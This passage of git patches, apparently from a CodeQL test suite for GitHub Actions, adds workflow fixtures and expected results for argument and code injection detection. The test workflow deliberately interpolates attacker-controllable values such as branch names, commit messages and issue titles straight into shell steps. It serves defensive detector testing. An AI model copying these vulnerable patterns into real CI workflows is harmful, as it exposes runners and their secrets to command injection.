"foo" \| sed "s/FOO/$TITLE/g" > bar) | provenance | | nodes | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | semmle.label | github.event.issue.title | -| .github/workflows/arg_injection.yml:15:14:16:31 | sed "s/FOO/$TITLE/g"\n | semmle.label | sed "s/FOO/$TITLE/g"\n | +| .github/workflows/arg_injection.yml:14:14:14:33 | sed "s/FOO/$TITLE/g" | semmle.label | sed "s/FOO/$TITLE/g" | +| .github/workflows/arg_injection.yml:15:14:15:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | semmle.label | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | +| .github/workflows/arg_injection.yml:16:14:16:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | semmle.label | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | subpaths #select -| .github/workflows/arg_injection.yml:15:14:16:31 | sed "s/FOO/$TITLE/g"\n | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:15:14:16:31 | sed "s/FOO/$TITLE/g"\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:15:14:16:31 | sed "s/FOO/$TITLE/g"\n | sed | +| .github/workflows/arg_injection.yml:14:14:14:33 | sed "s/FOO/$TITLE/g" | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:14:14:14:33 | sed "s/FOO/$TITLE/g" | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:14:14:14:33 | sed "s/FOO/$TITLE/g" | sed | +| .github/workflows/arg_injection.yml:15:14:15:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:15:14:15:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:15:14:15:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | sed | +| .github/workflows/arg_injection.yml:16:14:16:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:16:14:16:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:16:14:16:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | sed | diff --git a/ql/test/query-tests/Security/CWE-094/ArgumentInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/ArgumentInjectionMedium.expected index 37fd97270d7f..c2ff2885a995 100644 --- a/ql/test/query-tests/Security/CWE-094/ArgumentInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/ArgumentInjectionMedium.expected @@ -1,7 +1,11 @@ edges -| .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:15:14:16:31 | sed "s/FOO/$TITLE/g"\n | provenance | | +| .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:14:14:14:33 | sed "s/FOO/$TITLE/g" | provenance | | +| .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:15:14:15:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | provenance | | +| .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:16:14:16:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | provenance | | nodes | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | semmle.label | github.event.issue.title | -| .github/workflows/arg_injection.yml:15:14:16:31 | sed "s/FOO/$TITLE/g"\n | semmle.label | sed "s/FOO/$TITLE/g"\n | +| .github/workflows/arg_injection.yml:14:14:14:33 | sed "s/FOO/$TITLE/g" | semmle.label | sed "s/FOO/$TITLE/g" | +| .github/workflows/arg_injection.yml:15:14:15:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | semmle.label | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | +| .github/workflows/arg_injection.yml:16:14:16:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | semmle.label | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | subpaths #select From 56af52a729c8a614b2cb4c3784b13622dc519110 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 11 Jul 2024 10:46:37 +0200 Subject: [PATCH 398/707] feat(tests): New tests for Command Injection Injections on a workflow_run triggered protected by a allow branches list should not be reported as critical --- .../CWE-094/.github/workflows/test10.yml | 568 ++++++++++++++++++ .../CWE-094/CodeInjectionCritical.expected | 6 + .../CWE-094/CodeInjectionMedium.expected | 12 + 3 files changed, 586 insertions(+) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/test10.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test10.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test10.yml new file mode 100644 index 000000000000..1bc02ccd826e --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/test10.yml @@ -0,0 +1,568 @@ +name: Self-hosted runner (push) + +on: + workflow_run: + workflows: ["Self-hosted runner (push-caller)"] + branches: ["main"] + types: [completed] + push: + branches: + - ci_* + - ci-* + paths: + - "src/**" + - "tests/**" + - ".github/**" + - "templates/**" + - "utils/**" + repository_dispatch: + +env: + HF_HOME: /mnt/cache + TRANSFORMERS_IS_CI: yes + OMP_NUM_THREADS: 8 + MKL_NUM_THREADS: 8 + PYTEST_TIMEOUT: 60 + TF_FORCE_GPU_ALLOW_GROWTH: true + RUN_PT_TF_CROSS_TESTS: 1 + CUDA_VISIBLE_DEVICES: 0,1 + +jobs: + setup: + name: Setup + strategy: + matrix: + machine_type: [single-gpu, multi-gpu] + runs-on: ['${{ matrix.machine_type }}', nvidia-gpu, t4, push-ci] + container: + image: huggingface/transformers-all-latest-gpu-push-ci + options: --gpus 0 --shm-size "16gb" --ipc host -v /mnt/cache/.cache/huggingface:/mnt/cache/ + outputs: + matrix: ${{ steps.set-matrix.outputs.matrix }} + test_map: ${{ steps.set-matrix.outputs.test_map }} + steps: + # Necessary to get the correct branch name and commit SHA for `workflow_run` event + # We also take into account the `push` event (we might want to test some changes in a branch) + - name: Prepare custom environment variables + shell: bash + # `CI_BRANCH_PUSH`: The branch name from the push event + # `CI_BRANCH_WORKFLOW_RUN`: The name of the branch on which this workflow is triggered by `workflow_run` event + # `CI_BRANCH`: The non-empty branch name from the above two (one and only one of them is empty) + # `CI_SHA_PUSH`: The commit SHA from the push event + # `CI_SHA_WORKFLOW_RUN`: The commit SHA that triggers this workflow by `workflow_run` event + # `CI_SHA`: The non-empty commit SHA from the above two (one and only one of them is empty) + run: | + CI_BRANCH_PUSH=${{ github.event.ref }} + CI_BRANCH_PUSH=${CI_BRANCH_PUSH/'refs/heads/'/''} + CI_BRANCH_WORKFLOW_RUN=${{ github.event.workflow_run.head_branch }} + CI_SHA_PUSH=${{ github.event.head_commit.id }} + CI_SHA_WORKFLOW_RUN=${{ github.event.workflow_run.head_sha }} + echo $CI_BRANCH_PUSH + echo $CI_BRANCH_WORKFLOW_RUN + echo $CI_SHA_PUSH + echo $CI_SHA_WORKFLOW_RUN + [[ ! -z "$CI_BRANCH_PUSH" ]] && echo "CI_BRANCH=$CI_BRANCH_PUSH" >> $GITHUB_ENV || echo "CI_BRANCH=$CI_BRANCH_WORKFLOW_RUN" >> $GITHUB_ENV + [[ ! -z "$CI_SHA_PUSH" ]] && echo "CI_SHA=$CI_SHA_PUSH" >> $GITHUB_ENV || echo "CI_SHA=$CI_SHA_WORKFLOW_RUN" >> $GITHUB_ENV + + - name: print environment variables + run: | + echo "env.CI_BRANCH = ${{ env.CI_BRANCH }}" + echo "env.CI_SHA = ${{ env.CI_SHA }}" + + - name: Update clone using environment variables + working-directory: /transformers + run: | + echo "original branch = $(git branch --show-current)" + git fetch && git checkout ${{ env.CI_BRANCH }} + echo "updated branch = $(git branch --show-current)" + git checkout ${{ env.CI_SHA }} + echo "log = $(git log -n 1)" + + - name: Cleanup + working-directory: /transformers + run: | + rm -rf tests/__pycache__ + rm -rf tests/models/__pycache__ + rm -rf reports + + - name: Show installed libraries and their versions + working-directory: /transformers + run: pip freeze + + - name: Fetch the tests to run + working-directory: /transformers + # TODO: add `git-python` in the docker images + run: | + pip install --upgrade git-python + python3 utils/tests_fetcher.py --diff_with_last_commit | tee test_preparation.txt + + - name: Report fetched tests + uses: actions/upload-artifact@v4 + with: + name: test_fetched + path: /transformers/test_preparation.txt + + - id: set-matrix + name: Organize tests into models + working-directory: /transformers + # The `keys` is used as GitHub actions matrix for jobs, i.e. `models/bert`, `tokenization`, `pipeline`, etc. + # The `test_map` is used to get the actual identified test files under each key. + # If no test to run (so no `test_map.json` file), create a dummy map (empty matrix will fail) + run: | + if [ -f test_map.json ]; then + keys=$(python3 -c 'import json; fp = open("test_map.json"); test_map = json.load(fp); fp.close(); d = list(test_map.keys()); print(d)') + test_map=$(python3 -c 'import json; fp = open("test_map.json"); test_map = json.load(fp); fp.close(); print(test_map)') + else + keys=$(python3 -c 'keys = ["dummy"]; print(keys)') + test_map=$(python3 -c 'test_map = {"dummy": []}; print(test_map)') + fi + echo $keys + echo $test_map + echo "matrix=$keys" >> $GITHUB_OUTPUT + echo "test_map=$test_map" >> $GITHUB_OUTPUT + + run_tests_single_gpu: + name: Model tests + needs: setup + # `dummy` means there is no test to run + if: contains(fromJson(needs.setup.outputs.matrix), 'dummy') != true + strategy: + fail-fast: false + matrix: + folders: ${{ fromJson(needs.setup.outputs.matrix) }} + machine_type: [single-gpu] + runs-on: ['${{ matrix.machine_type }}', nvidia-gpu, t4, push-ci] + container: + image: huggingface/transformers-all-latest-gpu-push-ci + options: --gpus 0 --shm-size "16gb" --ipc host -v /mnt/cache/.cache/huggingface:/mnt/cache/ + steps: + # Necessary to get the correct branch name and commit SHA for `workflow_run` event + # We also take into account the `push` event (we might want to test some changes in a branch) + - name: Prepare custom environment variables + shell: bash + # For the meaning of these environment variables, see the job `Setup` + run: | + CI_BRANCH_PUSH=${{ github.event.ref }} + CI_BRANCH_PUSH=${CI_BRANCH_PUSH/'refs/heads/'/''} + CI_BRANCH_WORKFLOW_RUN=${{ github.event.workflow_run.head_branch }} + CI_SHA_PUSH=${{ github.event.head_commit.id }} + CI_SHA_WORKFLOW_RUN=${{ github.event.workflow_run.head_sha }} + echo $CI_BRANCH_PUSH + echo $CI_BRANCH_WORKFLOW_RUN + echo $CI_SHA_PUSH + echo $CI_SHA_WORKFLOW_RUN + [[ ! -z "$CI_BRANCH_PUSH" ]] && echo "CI_BRANCH=$CI_BRANCH_PUSH" >> $GITHUB_ENV || echo "CI_BRANCH=$CI_BRANCH_WORKFLOW_RUN" >> $GITHUB_ENV + [[ ! -z "$CI_SHA_PUSH" ]] && echo "CI_SHA=$CI_SHA_PUSH" >> $GITHUB_ENV || echo "CI_SHA=$CI_SHA_WORKFLOW_RUN" >> $GITHUB_ENV + + - name: print environment variables + run: | + echo "env.CI_BRANCH = ${{ env.CI_BRANCH }}" + echo "env.CI_SHA = ${{ env.CI_SHA }}" + + - name: Update clone using environment variables + working-directory: /transformers + run: | + echo "original branch = $(git branch --show-current)" + git fetch && git checkout ${{ env.CI_BRANCH }} + echo "updated branch = $(git branch --show-current)" + git checkout ${{ env.CI_SHA }} + echo "log = $(git log -n 1)" + + - name: Reinstall transformers in edit mode (remove the one installed during docker image build) + working-directory: /transformers + run: python3 -m pip uninstall -y transformers && python3 -m pip install -e . + + - name: Echo folder ${{ matrix.folders }} + shell: bash + # For folders like `models/bert`, set an env. var. (`matrix_folders`) to `models_bert`, which will be used to + # set the artifact folder names (because the character `/` is not allowed). + run: | + echo "${{ matrix.folders }}" + echo "${{ fromJson(needs.setup.outputs.test_map)[matrix.folders] }}" + matrix_folders=${{ matrix.folders }} + matrix_folders=${matrix_folders/'models/'/'models_'} + echo "$matrix_folders" + echo "matrix_folders=$matrix_folders" >> $GITHUB_ENV + + - name: NVIDIA-SMI + run: | + nvidia-smi + + - name: Environment + working-directory: /transformers + run: | + python3 utils/print_env.py + + - name: Show installed libraries and their versions + working-directory: /transformers + run: pip freeze + + - name: Run all non-slow selected tests on GPU + working-directory: /transformers + run: | + python3 -m pytest -n 2 --dist=loadfile -v --make-reports=${{ matrix.machine_type }}_tests_gpu_${{ matrix.folders }} ${{ fromJson(needs.setup.outputs.test_map)[matrix.folders] }} + + - name: Failure short reports + if: ${{ failure() }} + continue-on-error: true + run: cat /transformers/reports/${{ matrix.machine_type }}_tests_gpu_${{ matrix.folders }}/failures_short.txt + + - name: "Test suite reports artifacts: ${{ matrix.machine_type }}_run_all_tests_gpu_${{ env.matrix_folders }}_test_reports" + if: ${{ always() }} + uses: actions/upload-artifact@v4 + with: + name: ${{ matrix.machine_type }}_run_all_tests_gpu_${{ env.matrix_folders }}_test_reports + path: /transformers/reports/${{ matrix.machine_type }}_tests_gpu_${{ matrix.folders }} + + run_tests_multi_gpu: + name: Model tests + needs: setup + # `dummy` means there is no test to run + if: contains(fromJson(needs.setup.outputs.matrix), 'dummy') != true + strategy: + fail-fast: false + matrix: + folders: ${{ fromJson(needs.setup.outputs.matrix) }} + machine_type: [multi-gpu] + runs-on: ['${{ matrix.machine_type }}', nvidia-gpu, t4, push-ci] + container: + image: huggingface/transformers-all-latest-gpu-push-ci + options: --gpus all --shm-size "16gb" --ipc host -v /mnt/cache/.cache/huggingface:/mnt/cache/ + steps: + # Necessary to get the correct branch name and commit SHA for `workflow_run` event + # We also take into account the `push` event (we might want to test some changes in a branch) + - name: Prepare custom environment variables + shell: bash + # For the meaning of these environment variables, see the job `Setup` + run: | + CI_BRANCH_PUSH=${{ github.event.ref }} + CI_BRANCH_PUSH=${CI_BRANCH_PUSH/'refs/heads/'/''} + CI_BRANCH_WORKFLOW_RUN=${{ github.event.workflow_run.head_branch }} + CI_SHA_PUSH=${{ github.event.head_commit.id }} + CI_SHA_WORKFLOW_RUN=${{ github.event.workflow_run.head_sha }} + echo $CI_BRANCH_PUSH + echo $CI_BRANCH_WORKFLOW_RUN + echo $CI_SHA_PUSH + echo $CI_SHA_WORKFLOW_RUN + [[ ! -z "$CI_BRANCH_PUSH" ]] && echo "CI_BRANCH=$CI_BRANCH_PUSH" >> $GITHUB_ENV || echo "CI_BRANCH=$CI_BRANCH_WORKFLOW_RUN" >> $GITHUB_ENV + [[ ! -z "$CI_SHA_PUSH" ]] && echo "CI_SHA=$CI_SHA_PUSH" >> $GITHUB_ENV || echo "CI_SHA=$CI_SHA_WORKFLOW_RUN" >> $GITHUB_ENV + + - name: print environment variables + run: | + echo "env.CI_BRANCH = ${{ env.CI_BRANCH }}" + echo "env.CI_SHA = ${{ env.CI_SHA }}" + + - name: Update clone using environment variables + working-directory: /transformers + run: | + echo "original branch = $(git branch --show-current)" + git fetch && git checkout ${{ env.CI_BRANCH }} + echo "updated branch = $(git branch --show-current)" + git checkout ${{ env.CI_SHA }} + echo "log = $(git log -n 1)" + + - name: Reinstall transformers in edit mode (remove the one installed during docker image build) + working-directory: /transformers + run: python3 -m pip uninstall -y transformers && python3 -m pip install -e . + + - name: Echo folder ${{ matrix.folders }} + shell: bash + # For folders like `models/bert`, set an env. var. (`matrix_folders`) to `models_bert`, which will be used to + # set the artifact folder names (because the character `/` is not allowed). + run: | + echo "${{ matrix.folders }}" + echo "${{ fromJson(needs.setup.outputs.test_map)[matrix.folders] }}" + matrix_folders=${{ matrix.folders }} + matrix_folders=${matrix_folders/'models/'/'models_'} + echo "$matrix_folders" + echo "matrix_folders=$matrix_folders" >> $GITHUB_ENV + + - name: NVIDIA-SMI + run: | + nvidia-smi + + - name: Environment + working-directory: /transformers + run: | + python3 utils/print_env.py + + - name: Show installed libraries and their versions + working-directory: /transformers + run: pip freeze + + - name: Run all non-slow selected tests on GPU + env: + MKL_SERVICE_FORCE_INTEL: 1 + working-directory: /transformers + run: | + python3 -m pytest -n 2 --dist=loadfile -v --make-reports=${{ matrix.machine_type }}_tests_gpu_${{ matrix.folders }} ${{ fromJson(needs.setup.outputs.test_map)[matrix.folders] }} + + - name: Failure short reports + if: ${{ failure() }} + continue-on-error: true + run: cat /transformers/reports/${{ matrix.machine_type }}_tests_gpu_${{ matrix.folders }}/failures_short.txt + + - name: "Test suite reports artifacts: ${{ matrix.machine_type }}_run_all_tests_gpu_${{ env.matrix_folders }}_test_reports" + if: ${{ always() }} + uses: actions/upload-artifact@v4 + with: + name: ${{ matrix.machine_type }}_run_all_tests_gpu_${{ env.matrix_folders }}_test_reports + path: /transformers/reports/${{ matrix.machine_type }}_tests_gpu_${{ matrix.folders }} + + run_tests_torch_cuda_extensions_single_gpu: + name: Torch CUDA extension tests + needs: setup + if: contains(fromJson(needs.setup.outputs.matrix), 'deepspeed') || contains(fromJson(needs.setup.outputs.matrix), 'extended') + strategy: + fail-fast: false + matrix: + machine_type: [single-gpu] + runs-on: ['${{ matrix.machine_type }}', nvidia-gpu, t4, push-ci] + container: + image: huggingface/transformers-pytorch-deepspeed-latest-gpu-push-ci + options: --gpus 0 --shm-size "16gb" --ipc host -v /mnt/cache/.cache/huggingface:/mnt/cache/ + steps: + # Necessary to get the correct branch name and commit SHA for `workflow_run` event + # We also take into account the `push` event (we might want to test some changes in a branch) + - name: Prepare custom environment variables + shell: bash + # For the meaning of these environment variables, see the job `Setup` + run: | + CI_BRANCH_PUSH=${{ github.event.ref }} + CI_BRANCH_PUSH=${CI_BRANCH_PUSH/'refs/heads/'/''} + CI_BRANCH_WORKFLOW_RUN=${{ github.event.workflow_run.head_branch }} + CI_SHA_PUSH=${{ github.event.head_commit.id }} + CI_SHA_WORKFLOW_RUN=${{ github.event.workflow_run.head_sha }} + echo $CI_BRANCH_PUSH + echo $CI_BRANCH_WORKFLOW_RUN + echo $CI_SHA_PUSH + echo $CI_SHA_WORKFLOW_RUN + [[ ! -z "$CI_BRANCH_PUSH" ]] && echo "CI_BRANCH=$CI_BRANCH_PUSH" >> $GITHUB_ENV || echo "CI_BRANCH=$CI_BRANCH_WORKFLOW_RUN" >> $GITHUB_ENV + [[ ! -z "$CI_SHA_PUSH" ]] && echo "CI_SHA=$CI_SHA_PUSH" >> $GITHUB_ENV || echo "CI_SHA=$CI_SHA_WORKFLOW_RUN" >> $GITHUB_ENV + + - name: print environment variables + run: | + echo "env.CI_BRANCH = ${{ env.CI_BRANCH }}" + echo "env.CI_SHA = ${{ env.CI_SHA }}" + + - name: Update clone using environment variables + working-directory: /workspace/transformers + run: | + echo "original branch = $(git branch --show-current)" + git fetch && git checkout ${{ env.CI_BRANCH }} + echo "updated branch = $(git branch --show-current)" + git checkout ${{ env.CI_SHA }} + echo "log = $(git log -n 1)" + + - name: Reinstall transformers in edit mode (remove the one installed during docker image build) + working-directory: /workspace/transformers + run: python3 -m pip uninstall -y transformers && python3 -m pip install -e . + + - name: Remove cached torch extensions + run: rm -rf /github/home/.cache/torch_extensions/ + + # To avoid unknown test failures + - name: Pre build DeepSpeed *again* + working-directory: /workspace + run: | + python3 -m pip uninstall -y deepspeed + DS_BUILD_CPU_ADAM=1 DS_BUILD_FUSED_ADAM=1 python3 -m pip install deepspeed --global-option="build_ext" --global-option="-j8" --no-cache -v --disable-pip-version-check + + - name: NVIDIA-SMI + run: | + nvidia-smi + + - name: Environment + working-directory: /workspace/transformers + run: | + python utils/print_env.py + + - name: Show installed libraries and their versions + working-directory: /workspace/transformers + run: pip freeze + + - name: Run all non-slow selected tests on GPU + working-directory: /workspace/transformers + # TODO: Here we pass all tests in the 2 folders for simplicity. It's better to pass only the identified tests. + run: | + python -m pytest -n 1 --dist=loadfile -v --make-reports=${{ matrix.machine_type }}_run_torch_cuda_extensions_gpu_test_reports tests/deepspeed tests/extended + + - name: Failure short reports + if: ${{ failure() }} + continue-on-error: true + run: cat /workspace/transformers/reports/${{ matrix.machine_type }}_run_torch_cuda_extensions_gpu_test_reports/failures_short.txt + + - name: "Test suite reports artifacts: ${{ matrix.machine_type }}_run_torch_cuda_extensions_gpu_test_reports" + if: ${{ always() }} + uses: actions/upload-artifact@v4 + with: + name: ${{ matrix.machine_type }}_run_torch_cuda_extensions_gpu_test_reports + path: /workspace/transformers/reports/${{ matrix.machine_type }}_run_torch_cuda_extensions_gpu_test_reports + + run_tests_torch_cuda_extensions_multi_gpu: + name: Torch CUDA extension tests + needs: setup + if: contains(fromJson(needs.setup.outputs.matrix), 'deepspeed') || contains(fromJson(needs.setup.outputs.matrix), 'extended') + strategy: + fail-fast: false + matrix: + machine_type: [multi-gpu] + runs-on: ['${{ matrix.machine_type }}', nvidia-gpu, t4, push-ci] + container: + image: huggingface/transformers-pytorch-deepspeed-latest-gpu-push-ci + options: --gpus all --shm-size "16gb" --ipc host -v /mnt/cache/.cache/huggingface:/mnt/cache/ + steps: + # Necessary to get the correct branch name and commit SHA for `workflow_run` event + # We also take into account the `push` event (we might want to test some changes in a branch) + - name: Prepare custom environment variables + shell: bash + # For the meaning of these environment variables, see the job `Setup` + run: | + CI_BRANCH_PUSH=${{ github.event.ref }} + CI_BRANCH_PUSH=${CI_BRANCH_PUSH/'refs/heads/'/''} + CI_BRANCH_WORKFLOW_RUN=${{ github.event.workflow_run.head_branch }} + CI_SHA_PUSH=${{ github.event.head_commit.id }} + CI_SHA_WORKFLOW_RUN=${{ github.event.workflow_run.head_sha }} + echo $CI_BRANCH_PUSH + echo $CI_BRANCH_WORKFLOW_RUN + echo $CI_SHA_PUSH + echo $CI_SHA_WORKFLOW_RUN + [[ ! -z "$CI_BRANCH_PUSH" ]] && echo "CI_BRANCH=$CI_BRANCH_PUSH" >> $GITHUB_ENV || echo "CI_BRANCH=$CI_BRANCH_WORKFLOW_RUN" >> $GITHUB_ENV + [[ ! -z "$CI_SHA_PUSH" ]] && echo "CI_SHA=$CI_SHA_PUSH" >> $GITHUB_ENV || echo "CI_SHA=$CI_SHA_WORKFLOW_RUN" >> $GITHUB_ENV + + - name: print environment variables + run: | + echo "env.CI_BRANCH = ${{ env.CI_BRANCH }}" + echo "env.CI_SHA = ${{ env.CI_SHA }}" + + - name: Update clone using environment variables + working-directory: /workspace/transformers + run: | + echo "original branch = $(git branch --show-current)" + git fetch && git checkout ${{ env.CI_BRANCH }} + echo "updated branch = $(git branch --show-current)" + git checkout ${{ env.CI_SHA }} + echo "log = $(git log -n 1)" + + - name: Reinstall transformers in edit mode (remove the one installed during docker image build) + working-directory: /workspace/transformers + run: python3 -m pip uninstall -y transformers && python3 -m pip install -e . + + - name: Remove cached torch extensions + run: rm -rf /github/home/.cache/torch_extensions/ + + # To avoid unknown test failures + - name: Pre build DeepSpeed *again* + working-directory: /workspace + run: | + python3 -m pip uninstall -y deepspeed + DS_BUILD_CPU_ADAM=1 DS_BUILD_FUSED_ADAM=1 python3 -m pip install deepspeed --global-option="build_ext" --global-option="-j8" --no-cache -v --disable-pip-version-check + + - name: NVIDIA-SMI + run: | + nvidia-smi + + - name: Environment + working-directory: /workspace/transformers + run: | + python utils/print_env.py + + - name: Show installed libraries and their versions + working-directory: /workspace/transformers + run: pip freeze + + - name: Run all non-slow selected tests on GPU + working-directory: /workspace/transformers + # TODO: Here we pass all tests in the 2 folders for simplicity. It's better to pass only the identified tests. + run: | + python -m pytest -n 1 --dist=loadfile -v --make-reports=${{ matrix.machine_type }}_run_torch_cuda_extensions_gpu_test_reports tests/deepspeed tests/extended + + - name: Failure short reports + if: ${{ failure() }} + continue-on-error: true + run: cat /workspace/transformers/reports/${{ matrix.machine_type }}_run_torch_cuda_extensions_gpu_test_reports/failures_short.txt + + - name: "Test suite reports artifacts: ${{ matrix.machine_type }}_run_torch_cuda_extensions_gpu_test_reports" + if: ${{ always() }} + uses: actions/upload-artifact@v4 + with: + name: ${{ matrix.machine_type }}_run_torch_cuda_extensions_gpu_test_reports + path: /workspace/transformers/reports/${{ matrix.machine_type }}_run_torch_cuda_extensions_gpu_test_reports + + send_results: + name: Send results to webhook + runs-on: ubuntu-22.04 + if: always() + needs: [ + setup, + run_tests_single_gpu, + run_tests_multi_gpu, + run_tests_torch_cuda_extensions_single_gpu, + run_tests_torch_cuda_extensions_multi_gpu + ] + steps: + - name: Preliminary job status + shell: bash + # For the meaning of these environment variables, see the job `Setup` + run: | + echo "Setup status: ${{ needs.setup.result }}" + + # Necessary to get the correct branch name and commit SHA for `workflow_run` event + # We also take into account the `push` event (we might want to test some changes in a branch) + - name: Prepare custom environment variables + shell: bash + # For the meaning of these environment variables, see the job `Setup` + run: | + CI_BRANCH_PUSH=${{ github.event.ref }} + CI_BRANCH_PUSH=${CI_BRANCH_PUSH/'refs/heads/'/''} + CI_BRANCH_WORKFLOW_RUN=${{ github.event.workflow_run.head_branch }} + CI_SHA_PUSH=${{ github.event.head_commit.id }} + CI_SHA_WORKFLOW_RUN=${{ github.event.workflow_run.head_sha }} + echo $CI_BRANCH_PUSH + echo $CI_BRANCH_WORKFLOW_RUN + echo $CI_SHA_PUSH + echo $CI_SHA_WORKFLOW_RUN + [[ ! -z "$CI_BRANCH_PUSH" ]] && echo "CI_BRANCH=$CI_BRANCH_PUSH" >> $GITHUB_ENV || echo "CI_BRANCH=$CI_BRANCH_WORKFLOW_RUN" >> $GITHUB_ENV + [[ ! -z "$CI_SHA_PUSH" ]] && echo "CI_SHA=$CI_SHA_PUSH" >> $GITHUB_ENV || echo "CI_SHA=$CI_SHA_WORKFLOW_RUN" >> $GITHUB_ENV + + - name: print environment variables + run: | + echo "env.CI_BRANCH = ${{ env.CI_BRANCH }}" + echo "env.CI_SHA = ${{ env.CI_SHA }}" + + - uses: actions/checkout@v4 + # To avoid failure when multiple commits are merged into `main` in a short period of time. + # Checking out to an old commit beyond the fetch depth will get an error `fatal: reference is not a tree: ... + # (Only required for `workflow_run` event, where we get the latest HEAD on `main` instead of the event commit) + with: + fetch-depth: 20 + + - name: Update clone using environment variables + run: | + echo "original branch = $(git branch --show-current)" + git fetch && git checkout ${{ env.CI_BRANCH }} + echo "updated branch = $(git branch --show-current)" + git checkout ${{ env.CI_SHA }} + echo "log = $(git log -n 1)" + + - uses: actions/download-artifact@v4 + - name: Send message to Slack + env: + CI_SLACK_BOT_TOKEN: ${{ secrets.CI_SLACK_BOT_TOKEN }} + CI_SLACK_CHANNEL_ID: ${{ secrets.CI_SLACK_CHANNEL_ID }} + CI_SLACK_CHANNEL_ID_DAILY: ${{ secrets.CI_SLACK_CHANNEL_ID_DAILY }} + CI_SLACK_CHANNEL_DUMMY_TESTS: ${{ secrets.CI_SLACK_CHANNEL_DUMMY_TESTS }} + CI_SLACK_REPORT_CHANNEL_ID: ${{ secrets.CI_SLACK_CHANNEL_ID }} + ACCESS_REPO_INFO_TOKEN: ${{ secrets.ACCESS_REPO_INFO_TOKEN }} + CI_EVENT: push + CI_TITLE_PUSH: ${{ github.event.head_commit.message }} + CI_TITLE_WORKFLOW_RUN: ${{ github.event.workflow_run.head_commit.message }} + CI_SHA: ${{ env.CI_SHA }} + SETUP_STATUS: ${{ needs.setup.result }} + + # We pass `needs.setup.outputs.matrix` as the argument. A processing in `notification_service.py` to change + # `models/bert` to `models_bert` is required, as the artifact names use `_` instead of `/`. + run: | + pip install slack_sdk + pip show slack_sdk + python utils/notification_service.py "${{ needs.setup.outputs.matrix }}" diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected index 3330ad89311f..3f2d9ebc2c9c 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected @@ -272,6 +272,12 @@ nodes | .github/workflows/test9.yml:35:42:35:80 | toJson(github.event.issue.title) | semmle.label | toJson(github.event.issue.title) | | .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | semmle.label | github.event.issue.title | | .github/workflows/test9.yml:43:42:43:80 | toJson(github.event.issue.title) | semmle.label | toJson(github.event.issue.title) | +| .github/workflows/test10.yml:57:34:57:77 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/test10.yml:147:34:147:77 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/test10.yml:240:34:240:77 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/test10.yml:333:34:333:77 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/test10.yml:423:34:423:77 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/test10.yml:518:34:518:77 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index e325205d8c89..4de44d836355 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected @@ -272,6 +272,12 @@ nodes | .github/workflows/test9.yml:35:42:35:80 | 